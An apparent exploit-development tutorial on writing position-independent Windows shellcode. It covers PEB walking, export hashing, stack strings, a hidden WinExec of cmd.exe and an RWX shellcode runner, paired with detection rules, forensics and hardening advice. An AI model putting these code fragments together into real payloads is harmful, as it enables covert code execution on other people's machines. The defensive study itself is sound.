Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses

By Debraj Basak · Jun 20, 2026 · 13 min read · Exploit Development

Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.


1. What Makes Code Position-Dependent?

A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.

Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.

The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).


2. The Problem with the IAT

A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA], an indirect call through a slot the loader populated. Shellcode cannot do this:

  • It has no .idata section, no IMAGE_IMPORT_DESCRIPTOR, and no loader to read them.
  • It cannot embed an absolute kernel32!LoadLibraryA address because ASLR randomizes module bases every boot.
  • It cannot rely on Windows syscall numbers either — those numbers are not a stable ABI and shift between builds.

The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).


3. Windows Memory Layout Primer: TEB, PEB, and the Loader

Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:

| Architecture | Instruction | Result |
| --- | --- | --- |
| x86 | MOV EAX, FS:[0x30] | EAX = TEB.ProcessEnvironmentBlock (PEB) |
| x64 | MOV RAX, GS:[0x60] | RAX = TEB.ProcessEnvironmentBlock (PEB) |

From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.

Relevant offsets (Windows 10/11):

| Struct | Field | x86 offset | x64 offset |
| --- | --- | --- | --- |
| _TEB | ProcessEnvironmentBlock | +0x030 | +0x060 |
| _PEB | Ldr | +0x00C | +0x018 |
| _PEB_LDR_DATA | InLoadOrderModuleList | +0x00C | +0x010 |
| _PEB_LDR_DATA | InMemoryOrderModuleList | +0x014 | +0x020 |
| _PEB_LDR_DATA | InInitializationOrderModuleList | +0x01C | +0x030 |
| _LDR_DATA_TABLE_ENTRY | DllBase | +0x018 | +0x030 |
| _LDR_DATA_TABLE_ENTRY | BaseDllName | +0x02C | +0x058 |

Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.

// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY     InLoadOrderLinks;        // +0x00
    LIST_ENTRY     InMemoryOrderLinks;      // +0x10 (x64)
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;                 // +0x30 (x64)
    PVOID          EntryPoint;
    ULONG          SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;             // +0x58 (x64)
    // ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

Flowchart showing the shellcode pointer chain from TEB via PEB and PEB_LDR_DATA to the kernel32.dll DllBase field
Every PIC shellcode begins here: a single segment-register read unravels the full loader chain to kernel32’s image base.

4. Walking the Module List to Find kernel32.dll

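The loader populates InMemoryOrderModuleList in a predictable order on current Windows builds: the main executable first, then ntdll.dll, then kernel32.dll. (InInitializationOrderModuleList omits the executable and, since Windows 7, typically lists kernelbase.dll ahead of kernel32.dll, so it is a poorer fit for this shortcut.) A common shortcut is to grab the third entry’s DllBase without ever comparing a name: fewer bytes and no embedded strings, at the cost of breaking if the load order ever changes.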

; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address

    xor   rcx, rcx
    mov   rax, [gs:rcx + 0x60]      ; RAX = PEB
    mov   rax, [rax + 0x18]         ; RAX = PEB->Ldr
    mov   rax, [rax + 0x20]         ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
    mov   rax, [rax]                ; 2nd entry: ntdll.dll
    mov   rax, [rax]                ; 3rd entry: kernel32.dll
    mov   rbx, [rax + 0x20]         ; LDR_DATA_TABLE_ENTRY.DllBase
                                    ; (offset 0x20 within an InMemoryOrder-rooted entry)

For 32-bit shellcode the same idea applies with smaller offsets:

; x86 — same walk, FS-relative
    xor   ecx, ecx
    mov   eax, [fs:ecx + 0x30]      ; EAX = PEB
    mov   eax, [eax + 0x0C]         ; PEB->Ldr
    mov   eax, [eax + 0x14]         ; InMemoryOrderModuleList.Flink
    mov   eax, [eax]                ; 2nd
    mov   eax, [eax]                ; 3rd (kernel32)
    mov   ebx, [eax + 0x10]         ; DllBase (x86 offset)

A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.
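
The 0x20 and 0x10 displacements in the listings above follow from the Section 3 offsets: the walk holds a pointer to an entry's InMemoryOrderLinks field, not to the start of the entry. The sketch below redoes that arithmetic in Python. The dictionary and function names are illustrative, and the x86 InMemoryOrderLinks offset (0x08) is an assumption derived from one LIST_ENTRY being two 4-byte pointers.

```python
# Field offsets inside _LDR_DATA_TABLE_ENTRY, taken from the Section 3 table.
# InMemoryOrderLinks sits one LIST_ENTRY (two pointers) past the entry start;
# the x86 value 0x08 is derived from that, not listed in the table.
LDR_ENTRY_OFFSETS = {
    "x86": {"InMemoryOrderLinks": 0x08, "DllBase": 0x18, "BaseDllName": 0x2C},
    "x64": {"InMemoryOrderLinks": 0x10, "DllBase": 0x30, "BaseDllName": 0x58},
}


def offset_from_memory_order_link(arch: str, field: str) -> int:
    """Displacement of `field` from a pointer into InMemoryOrderLinks."""
    layout = LDR_ENTRY_OFFSETS[arch]
    return layout[field] - layout["InMemoryOrderLinks"]


for arch in ("x86", "x64"):
    disp = offset_from_memory_order_link(arch, "DllBase")
    print(f"{arch}: DllBase at [link + {disp:#x}]")
```

The same subtraction gives the displacement for BaseDllName when a name-comparing variant is used, and it is a quick way to sanity-check offsets read from a disassembly against WinDbg's dt output.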


5. Parsing the PE Export Directory

Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:

ImageBase
  └─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
        └─► IMAGE_NT_HEADERS
              └─► OptionalHeader.DataDirectory[0]  ; EXPORT
                    └─► IMAGE_EXPORT_DIRECTORY
                          ├─ NumberOfNames
                          ├─ AddressOfNames        (RVA → name RVAs)
                          ├─ AddressOfNameOrdinals (RVA → ordinal table)
                          └─ AddressOfFunctions    (RVA → function RVAs)

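AddressOfNames and AddressOfNameOrdinals are parallel arrays: index i in AddressOfNames matches index i in AddressOfNameOrdinals, whose 16-bit value o indexes AddressOfFunctions[o]. AddressOfFunctions is not parallel to the other two, because it also holds functions exported by ordinal only. Entries in AddressOfNames and AddressOfFunctions are 32-bit RVAs, so the resolved function address is ImageBase + RVA. If that RVA falls inside the export directory itself, the entry is a forwarder string (for example, a redirect into ntdll) rather than code, and a resolver has to handle or skip it.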

; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
    mov   eax, dword [rbx + 0x3C]   ; DOS.e_lfanew
    lea   rdx, [rbx + rax]          ; RDX -> IMAGE_NT_HEADERS
    mov   eax, dword [rdx + 0x88]   ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
    lea   rcx, [rbx + rax]          ; RCX -> IMAGE_EXPORT_DIRECTORY

    mov   r8d,  dword [rcx + 0x18]  ; NumberOfNames
    mov   r9d,  dword [rcx + 0x20]  ; AddressOfNames     (RVA)
    mov   r10d, dword [rcx + 0x24]  ; AddressOfNameOrdinals
    mov   r11d, dword [rcx + 0x1C]  ; AddressOfFunctions

The resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].
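
The two-step lookup described above can be modelled in a few lines of Python. This is a minimal sketch over plain lists standing in for the three export arrays, not a PE parser; the function name, the toy table, and the base address are all made up for illustration.

```python
from typing import Callable, Optional, Sequence


def resolve_export(
    image_base: int,
    names: Sequence[str],           # strings reached through AddressOfNames
    name_ordinals: Sequence[int],   # 16-bit indices from AddressOfNameOrdinals
    function_rvas: Sequence[int],   # 32-bit RVAs from AddressOfFunctions
    matches: Callable[[str], bool],
) -> Optional[int]:
    """Return image_base + RVA for the first name accepted by `matches`."""
    for i, name in enumerate(names):
        if matches(name):
            ordinal_index = name_ordinals[i]                   # name index -> ordinal
            return image_base + function_rvas[ordinal_index]   # ordinal -> RVA
    return None


# Toy export table with made-up values. Function 0 is exported by ordinal
# only, so the name table is shorter than the function table.
base = 0x7FF800000000
names = ["Alpha", "Beta"]
name_ordinals = [2, 1]
function_rvas = [0x1000, 0x2000, 0x3000]

addr = resolve_export(base, names, name_ordinals, function_rvas,
                      lambda n: n == "Alpha")
print(hex(addr))
```

Passing the comparison in as a callable keeps the walk separate from how a name is recognised, so the same loop works with a literal string compare or with a hash compare.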


Flowchart illustrating the three parallel export table arrays — AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions — and how they combine to resolve a Windows API address at runtime
The export directory’s three arrays form a two-step indirection: name index maps to ordinal, ordinal maps to function RVA.

6. Function Name Hashing (ROR-13)

Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:

// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
    unsigned int h = 0;
    while (*name) {
        h = (h >> 13) | (h << (32 - 13));   // ROR 13
        h += (unsigned char)*name++;
    }
    return h;
}

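// Pre-computed constants for the routine above (recompute for your toolchain):
// LoadLibraryA   -> 0xEC0E4E8E
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess    -> 0x73E2D87E
// VirtualAlloc   -> 0x91AFCA54
// Note: 0x0726774C, often quoted for LoadLibraryA, is Metasploit's block_api
// value, which also mixes in the module name; it will not match this routine.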

Replacing the while body with three cmp/ror/add instructions inside the export-walk loop produces a few dozen bytes of fully position-independent resolver — no strings, no absolute addresses, no relocations.
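
For analysts, the same hash is more useful in reverse: given 32-bit constants found in a sample, which export names produce them? The sketch below ports the C routine above to Python and builds a lookup table from a list of names. The helper names are illustrative, and the short name list stands in for a real export dump.

```python
from typing import Dict, Iterable, List


def ror13_hash(name: str) -> int:
    """ROR-13 additive hash over the ASCII bytes of an export name."""
    h = 0
    for byte in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF   # rotate right by 13
        h = (h + byte) & 0xFFFFFFFF                # add the character
    return h


def build_reverse_table(export_names: Iterable[str]) -> Dict[int, List[str]]:
    """Map each hash value to every name that produces it (collisions kept)."""
    table: Dict[int, List[str]] = {}
    for name in export_names:
        table.setdefault(ror13_hash(name), []).append(name)
    return table


# Placeholder list; in practice this would come from a DLL's export table.
candidate_names = ["LoadLibraryA", "GetProcAddress", "ExitProcess", "VirtualAlloc"]
table = build_reverse_table(candidate_names)
for value, matched in sorted(table.items()):
    print(f"{value:#010x} -> {matched}")
```

Keeping a list per hash value rather than a single name matters because a 32-bit additive hash can collide across a large export set. Variants that also hash the module name or use a different rotation count produce different constants, so a miss in this table does not rule out API hashing.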


7. RIP-Relative Addressing and the CALL/POP Trick

When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.

x64 makes this nearly free: every LEA reg, [rel label] and direct CALL/JMP is encoded RIP-relative:

    lea   rcx, [rel api_hash_table]   ; RIP-relative, no relocation needed

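x86 has no RIP-relative encoding. The classic substitute is the get-EIP trick: CALL the very next instruction, then POP the return address into a register, giving you a known anchor:

    call  get_eip                      ; E8 00 00 00 00: rel32 of zero, so four NUL bytes
get_eip:
    pop   ebp                          ; EBP = address of get_eip (this POP instruction)
    ; data referenced as [ebp + (label - get_eip)]
    ; where NULs matter (Section 8), the JMP-forward / CALL-backward variant
    ; yields a negative rel32 and avoids them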

Anything stored inline can now be addressed by displacement from EBP.
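
Both tricks work for the same reason: the encoded operand is a distance, not an address. The Python sketch below computes the displacement a RIP-relative LEA would carry and shows that it does not change when the blob is placed at different bases. The layout (a 7-byte LEA at offset 0x10 referencing data at offset 0x80) and the base addresses are hypothetical.

```python
def rel32(instr_addr: int, instr_len: int, target_addr: int) -> int:
    """Displacement stored in a RIP-relative operand or a near CALL/JMP.

    The CPU adds it to the address of the *next* instruction.
    """
    return target_addr - (instr_addr + instr_len)


def displacement_at(load_base: int) -> int:
    # Hypothetical blob layout: 7-byte LEA at +0x10, inline data at +0x80.
    lea_offset, lea_len, data_offset = 0x10, 7, 0x80
    return rel32(load_base + lea_offset, lea_len, load_base + data_offset)


for base in (0x0040_0000, 0x7FF6_1234_0000, 0x0213_5000_0000):
    print(f"{base:#x}: disp32 = {displacement_at(base):#x}")
```

One side effect worth noticing: a small forward displacement such as 0x69 is stored as 69 00 00 00, so forward references can reintroduce NUL bytes even though they need no relocation.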


8. Stack Strings and Null-Byte Elimination

Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.

Construct strings on the stack by pushing immediates:

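; Build "cmd.exe\0" on the stack (8 bytes including NUL)
    xor   rax, rax
    push  rax                       ; zero qword: padding, keeps the two pushes at 16 bytes
    mov   rax, 0xFF6578652E646D63   ; 'cmd.exe' (little-endian) plus 0xFF filler on top;
                                    ; the bare 7-byte value would encode a 0x00 there
    shl   rax, 8
    shr   rax, 8                    ; clear the filler: top byte becomes the string's NUL
    push  rax
    mov   rcx, rsp                  ; RCX -> "cmd.exe\0", first arg for WinExec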

Eliminate accidental nulls in opcodes:

| Avoid | Use instead | Reason |
| --- | --- | --- |
| mov rax, 0 (48 C7 C0 00 00 00 00) | xor rax, rax | Removes four NUL bytes |
| push 0 (6A 00) | xor reg, reg; push reg | 6A 00 contains a NUL |
| Short jumps spanning NUL displacements | Pad with nop or reorder code | Avoids NUL in the offset byte |
| mov al, 0x00 | xor al, al | Same fix at byte width |

Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.
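
From the analyst's side, stack strings are recovered by reading the pushed immediates back in memory order. The sketch below rebuilds the bytes left on the stack by a sequence of 64-bit pushes and checks whether an immediate would itself encode a NUL. Both helper names are illustrative. It also shows why a seven-character string packed into a 64-bit immediate is a problem: its top byte is zero.

```python
import struct
from typing import Sequence


def decode_pushed_qwords(pushes: Sequence[int]) -> bytes:
    """Rebuild the bytes left on the stack by a series of 64-bit pushes.

    `pushes` is in program order. The stack grows downward, so the last
    value pushed ends up at the lowest address and is read first.
    """
    return b"".join(struct.pack("<Q", value) for value in reversed(pushes))


def immediate_has_nul(value: int) -> bool:
    """True if the 8-byte little-endian encoding of `value` contains 0x00."""
    return 0 in struct.pack("<Q", value)


pushes = [0x0, 0x006578652E646D63]           # zero qword, then 'cmd.exe'
raw = decode_pushed_qwords(pushes)
print(raw.split(b"\x00", 1)[0].decode("ascii"))
print(immediate_has_nul(0x006578652E646D63))
```

The same decoder works on immediates lifted from a disassembly listing, which is often quicker than emulating the code when triaging a sample.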


9. x64 ABI Constraints: Shadow Space and Alignment

Windows x64 imposes two rules shellcode authors get wrong constantly:

  1. RSP must be 16-byte aligned at the point of CALL to any Windows API. The CALL itself pushes an 8-byte return address, so the callee’s RSP ends up at (16N - 8) on entry, which is what Microsoft’s prolog code expects.
  2. The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill RCX, RDX, R8, R9 into those slots.

The first four integer arguments go in RCX, RDX, R8, R9; further arguments go on the stack above the shadow space, with the fifth at [RSP+0x20] at the point of the CALL. Volatile registers (RAX, RCX, RDX, R8–R11) may be clobbered by any CALL; non-volatile registers (RBX, RBP, RDI, RSI, R12–R15) must be saved if you rely on them.

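; Calling WinExec("cmd.exe", SW_HIDE) once API is resolved in RAX
; Assumes RSI = pointer to "cmd.exe", saved (mov rsi, rsp) right after the
; string was built; a fixed [rsp + N] is unreliable once RSP is realigned.
    and   rsp, -16                  ; force 16-byte alignment
    sub   rsp, 32                   ; shadow space (home space)

    mov   rcx, rsi                  ; lpCmdLine -> "cmd.exe"
    xor   rdx, rdx                  ; uCmdShow = SW_HIDE (0)
    call  rax                       ; WinExec

    add   rsp, 32                   ; tear down shadow space (the AND adjustment is not undone)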

Misalignment typically manifests as STATUS_ACCESS_VIOLATION (0xC0000005) on an alignment-checked SSE instruction such as movaps or movdqa inside kernel32 or ntdll, a tell-tale crash signature when reviewing payloads.
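
The alignment rule is easy to check with plain arithmetic. The sketch below models the and rsp, -16 / sub rsp, 32 sequence for a few arbitrary starting stack pointers and reports RSP modulo 16 at the CALL and on callee entry. The function name and the sample addresses are illustrative.

```python
def simulate_call_setup(rsp: int) -> dict:
    """Model `and rsp, -16; sub rsp, 32; call ...` on a starting RSP."""
    aligned = rsp & ~0xF          # and rsp, -16
    at_call = aligned - 32        # sub rsp, 32 (shadow space)
    callee_entry = at_call - 8    # CALL pushes the 8-byte return address
    return {
        "at_call": at_call,
        "callee_entry": callee_entry,
        "shadow": (at_call, at_call + 32),   # [start, end) of the home space
    }


for start in (0x14FF08, 0x14FF10, 0x14FF1C):
    state = simulate_call_setup(start)
    print(f"{start:#x}: at_call % 16 = {state['at_call'] % 16}, "
          f"callee_entry % 16 = {state['callee_entry'] % 16}")
```

Whatever the starting value, RSP is a multiple of 16 at the CALL and 8 past a multiple of 16 on entry. The amount removed by the AND varies with the input, which is why a stack-relative offset computed before realignment cannot be trusted afterwards.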


10. Extraction and Controlled Testing

Once assembled with NASM, raw bytes are extracted from the COFF object and audited:

nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.bin

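A quick Python harness audits the raw blob: it reports the size, flags embedded NUL bytes, and dumps a C array for the test loader. It does not detect relocations; check those on the object file before extraction (for example with objdump -r payload.obj):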

# verify.py — sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")

null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
    print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
    print("[+] null-free")

# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")
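
The NUL scan says nothing about relocations, which live in the object file rather than in the extracted bytes. The sketch below reads the per-section NumberOfRelocations field from a COFF object; a non-zero count on .text means the assembler emitted an address the linker was expected to fix up. The function names are illustrative, the demo object is synthetic, and the parser ignores long section names and the relocation-overflow flag.

```python
import struct
from typing import Dict


def coff_section_relocations(obj: bytes) -> Dict[str, int]:
    """Map section name -> NumberOfRelocations for a COFF object file."""
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, n_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", obj, 0)
    table = 20 + opt_size                 # section table follows the header
    result: Dict[str, int] = {}
    for i in range(n_sections):
        off = table + i * 40              # IMAGE_SECTION_HEADER is 40 bytes
        name = obj[off:off + 8].rstrip(b"\x00").decode("ascii", "replace")
        (n_relocs,) = struct.unpack_from("<H", obj, off + 32)
        result[name] = n_relocs
    return result


def make_demo_object(n_relocs: int) -> bytes:
    """Synthetic one-section x64 object, header fields only (no section data)."""
    header = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0, 0)
    section = struct.pack("<8sIIIIIIHHI", b".text", 0, 0, 0, 0, 0, 0,
                          n_relocs, 0, 0x60500020)
    return header + section


print(coff_section_relocations(make_demo_object(0)))
print(coff_section_relocations(make_demo_object(3)))
```

Against a real build, the same function would be fed the bytes of payload.obj read in binary mode, and any non-zero count for .text is worth tracing back to the offending instruction.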

A minimal local loader executes the payload inside the same process for isolated VM testing — this is the educational sandbox, not a cross-process injector:

// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t        sc_len;

int main(void) {
    void *mem = VirtualAlloc(NULL, sc_len,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    memcpy(mem, sc, sc_len);
    ((void(*)())mem)();
    return 0;
}

The VirtualAlloc(PAGE_EXECUTE_READWRITE) → memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.


11. Common Attacker Techniques

| Technique | Description |
| --- | --- |
| PEB walking | Resolve kernel32/ntdll bases via GS:[0x60] / FS:[0x30] without imports |
| Export hash resolution | ROR-13 (or FNV/djb2) hashing to find APIs without embedded strings |
| Stack strings | Push immediates to materialise "cmd.exe", "WinExec", etc., on the stack |
| Reflective loading | PIC stub maps a full DLL into memory and calls its DllMain (T1620) |
| Remote injection | VirtualAllocEx + WriteProcessMemory + CreateRemoteThread into a target PID |
| APC queuing | QueueUserAPC to deliver shellcode into an alertable thread |
| Process hollowing | Suspend a benign process, unmap its image, write PIC payload, resume |
| Module stomping | Overwrite the .text of a legitimately loaded DLL with PIC shellcode |

12. Defensive Strategies & Detection

PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.

Sysmon Event IDs to monitor:

| Event ID | Signal |
| --- | --- |
| 1 | Process creation (with command line); anomalous parents (winword.exe → cmd.exe) |
| 7 | ImageLoad from user-writable paths into system processes |
| 8 | CreateRemoteThread; primary remote-injection signal |
| 10 | ProcessAccess with GrantedAccess containing 0x1F0FFF, 0x1410, or PROCESS_VM_WRITE \| PROCESS_VM_OPERATION \| PROCESS_CREATE_THREAD |
| 17/18 | Named pipe creation/connection (common C2 channel) |
| 25 | ProcessTampering (image hollowing) |

ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires the consumer to run as an anti-malware Protected Process Light (PPL), which in turn depends on an ELAM driver and its signing requirements; that is why EDR vendors, not generic SIEMs, own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.

Sigma sketch — cross-process handle access for injection:

title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess|contains:
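      - '0x1F0FFF'    # PROCESS_ALL_ACCESS (pre-Vista definition)
      - '0x1410'      # QUERY_LIMITED_INFORMATION|QUERY_INFORMATION|VM_READ (read-only; credential-dumping pattern)
      - '0x1F1FFF'    # near-full access; includes VM_WRITE and CREATE_THREAD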
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\MsSense.exe'
  condition: selection and not filter_legit
level: high
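
When tuning a rule like this, it helps to decode GrantedAccess values into individual rights instead of matching opaque hex strings. The sketch below uses the documented process-specific access-right bits; the function names and the choice of "injection mask" (VM_OPERATION, VM_WRITE and CREATE_THREAD together) are illustrative assumptions, not part of Sysmon or Sigma.

```python
from typing import List

# Process-specific access rights (low 16 bits of the mask), per the Windows SDK.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Rights needed for the classic allocate / write / remote-thread sequence.
INJECTION_MASK = 0x0008 | 0x0020 | 0x0002


def decode_access(mask: int) -> List[str]:
    """List the process-specific rights present in a GrantedAccess mask."""
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def allows_thread_injection(mask: int) -> bool:
    """True if the mask carries every right in INJECTION_MASK."""
    return (mask & INJECTION_MASK) == INJECTION_MASK


for value in (0x1F0FFF, 0x1410, 0x1F1FFF):
    print(f"{value:#x}: injection-capable={allows_thread_injection(value)}")
    print("   ", ", ".join(decode_access(value)))
```

Decoding makes it clear which listed values can support a write-and-execute injection and which only permit reading, so the two behaviours can be scored or routed separately.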

Memory-forensics indicators: Volatility 3 malfind locates private, non-image regions with executable protections (typically RWX) and dumps their first bytes so that code or PE headers stand out; ldrmodules cross-checks memory-mapped images against the three PEB loader lists and flags modules missing from any of them, which catches unlinked or manually mapped DLLs. Threads whose StartAddress falls inside a private allocation rather than a mapped image are inherently suspicious.
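
The triage logic behind these indicators is simple enough to sketch. The example below filters a list of memory-region records for executable pages that are not backed by an image file. The Region schema is hypothetical and is not the output format of Volatility or any other tool; real region listings would need to be mapped onto it first.

```python
from dataclasses import dataclass
from typing import Iterable, List

EXECUTABLE_PROTECTIONS = {
    "PAGE_EXECUTE",
    "PAGE_EXECUTE_READ",
    "PAGE_EXECUTE_READWRITE",
    "PAGE_EXECUTE_WRITECOPY",
}


@dataclass
class Region:
    """Hypothetical record for one virtual memory region."""
    base: int
    protection: str        # e.g. "PAGE_EXECUTE_READWRITE"
    region_type: str       # "MEM_PRIVATE", "MEM_MAPPED" or "MEM_IMAGE"
    mapped_file: str = ""  # backing file path, empty if none


def unbacked_executable(regions: Iterable[Region]) -> List[Region]:
    """Executable regions that are neither image-typed nor file-backed."""
    return [
        r for r in regions
        if r.protection in EXECUTABLE_PROTECTIONS
        and r.region_type != "MEM_IMAGE"
        and not r.mapped_file
    ]


sample = [
    Region(0x7FF800000000, "PAGE_EXECUTE_READ", "MEM_IMAGE",
           r"C:\Windows\System32\kernel32.dll"),
    Region(0x000001A000000000, "PAGE_EXECUTE_READWRITE", "MEM_PRIVATE"),
    Region(0x000001B000000000, "PAGE_READWRITE", "MEM_PRIVATE"),
]
for region in unbacked_executable(sample):
    print(f"{region.base:#x} {region.protection} {region.region_type}")
```

A filter like this produces false positives in processes that generate code legitimately, such as JIT-compiling runtimes, so hits are a starting point for inspection rather than a verdict.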

Hardening:

| Mitigation | Effect |
| --- | --- |
| ACG (ProcessDynamicCodePolicy) | Forbids new executable pages; breaks VirtualAlloc(PAGE_EXECUTE_READWRITE) |
| DEP / NX | Hardware-enforced non-execute on data pages |
| CFG | Invalidates indirect calls to non-registered targets |
| HVCI | Hypervisor-enforced kernel code integrity |
| ASR rules | Block office/script children, untrusted USB execution, etc. |
| Restrict SeDebugPrivilege | Limits which accounts can open and write to other processes |

Hierarchy diagram showing four defensive detection layers against PIC shellcode: ETW THREATINT telemetry, Sysmon event IDs, Volatility memory forensics, and OS hardening mitigations
Layered detection combines kernel-level ETW telemetry, Sysmon behavioral events, and offline memory analysis to catch shellcode across its full lifecycle.

13. Tools for PIC Shellcode Analysis

| Tool | Description | Link |
| --- | --- | --- |
| WinDbg | Verify struct offsets (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY) | microsoft.com |
| NASM | Assemble x86/x64 PIC payloads in Intel syntax | nasm.us |
| x64dbg | Dynamic analysis of shellcode in a loader harness | x64dbg.com |
| Ghidra / IDA | Static disassembly of extracted opcodes | ghidra-sre.org |
| Process Hacker | Inspect process memory regions and protections | processhacker.sf.io |
| pe-sieve | Hunts injected, hollowed, or stomped modules | github.com/hasherezade/pe-sieve |
| Volatility 3 | malfind, ldrmodules, vadinfo for memory-resident PIC | volatilityfoundation.org |
| YARA | Signature ROR-13 loops, PEB-walk prologues, hash tables | virustotal.github.io/yara |
| SilkETW | Subscribe to Kernel-Process and other ETW providers (THREATINT additionally needs a PPL consumer, as noted in Section 12) | github.com/mandiant/SilkETW |

14. MITRE ATT&CK Mapping

| Technique | MITRE ID | Detection |
| --- | --- | --- |
| Reflective Code Loading | T1620 | Volatility malfind / ldrmodules; THREATINT ETW |
| Process Injection (parent) | T1055 | Sysmon EID 10 + EID 8; ETW THREATINT WriteVM/AllocVM |
| Process Injection: DLL | T1055.001 | Sysmon EID 7 from unusual paths; pe-sieve |
| Process Injection: APC | T1055.004 | Kernel-Process ETW thread events on alertable waits |
| Process Injection: Hollowing | T1055.012 | Sysmon EID 25 ProcessTampering; pe-sieve hollowing scan |
| Obfuscated Files or Information | T1027 | YARA on ROR-13 hash loops and stack-string push sequences |
| Command and Scripting Interpreter | T1059 | EID 4688 / Sysmon EID 1 with command-line auditing |

Summary

  • Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
  • The PEB → Ldr → InMemoryOrderModuleList chain reaches kernel32.dll in three pointer dereferences without any string comparison.
  • Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
  • Stack-string construction, XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free.
